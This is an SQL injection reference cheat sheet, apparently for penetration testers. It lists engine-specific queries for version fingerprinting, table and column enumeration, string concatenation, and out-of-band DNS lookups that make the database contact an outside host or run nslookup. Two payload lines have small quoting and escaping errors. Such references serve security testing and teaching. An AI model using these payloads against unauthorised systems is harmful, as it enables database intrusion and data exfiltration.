Introduction

Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.

Database Version

Database	Version Info
Oracle	`SELECT banner FROM v$version` `SELECT version FROM v$instance`
Microsoft	`SELECT @@version`
PostgreSQL	`SELECT version()`
MySQL	`SELECT @@version`

Database Contents

Listing tables and the columns they contain:

Database	Contents Info
Oracle	`SELECT * FROM all_tables` `SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'`
Microsoft	`SELECT * FROM information_schema.tables` `SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'`
PostgreSQL	`SELECT * FROM information_schema.tables` `SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'`
MySQL	`SELECT * FROM information_schema.tables` `SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'`

String Concatenation

Database	Concatenation
Oracle	'a'\|\|'b'
Microsoft	'a'+'b'
PostgreSQL	'a'\|\|'b'
MySQL	'a' 'b' (space) or `CONCAT('a','b')`

DNS Lookups

Database	Lookup Syntax
Oracle	`SELECT UTL_INADDR.get_host_address('domain')` - requires elevated privileges
Microsoft	`exec master..xp_dirtree '//domain/a'`
PostgreSQL	`copy (SELECT '') to program 'nslookup domain`
MySQL	These work only on Windows `LOAD_FILE('\\\\domain\\a')` `SELECT ... INTO OUTFILE '\\\\domain\a'`